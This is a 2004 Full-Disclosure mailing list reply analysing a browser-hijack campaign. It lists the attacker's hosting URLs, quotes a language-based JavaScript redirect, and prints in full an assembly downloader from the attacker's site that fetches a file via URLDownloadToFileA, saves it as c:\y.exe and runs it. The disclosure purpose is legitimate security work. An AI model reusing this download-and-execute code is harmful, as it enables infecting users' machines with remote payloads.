[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] browser hijack by apache sites
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] browser hijack by apache sites
- From: Matthijs Dalhuijsen <thijs@xxxxxxxxxxxxxx>
- Date: Wed, 26 May 2004 04:45:42 +0200
On 24-mei-04, at 14:46, Feher Tamas wrote:
http://www.b00gle.com/fa/?d=get
good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/
%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/
tool.html+&hl=en
http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the
same files, as if copied in a for loop
i especially liked 2 files in the dir; counter.htm containing the
extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>
but then i saw this:
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope
im not Violating someones copyright by posting this here,....
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
.data
szLibrary db "urlmon.dll",0
szFunction db "URLDownloadToFileA",0
szFileName db "c:\y.exe", 0
.code
start:
invoke GetCommandLineA
add ax, 0Ah
lea ecx, [eax]
push ecx
invoke LoadLibrary, addr szLibrary
invoke GetProcAddress, eax, addr szFunction
pop ecx
push 0
push 0
lea ebx, [szFileName]
push ebx
push ecx
push 0
call eax
invoke WinExec, addr szFileName, 1
invoke ExitProcess, NULL
end start
Yet i do feel a bit suspicious about this set of files;,... bit TOO
educating i think ;)
cheers!
thijs
--
If i had 6 hours to chop down a tree, I'd spend the first four
sharpening the axe.
-- Abraham Lincoln
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html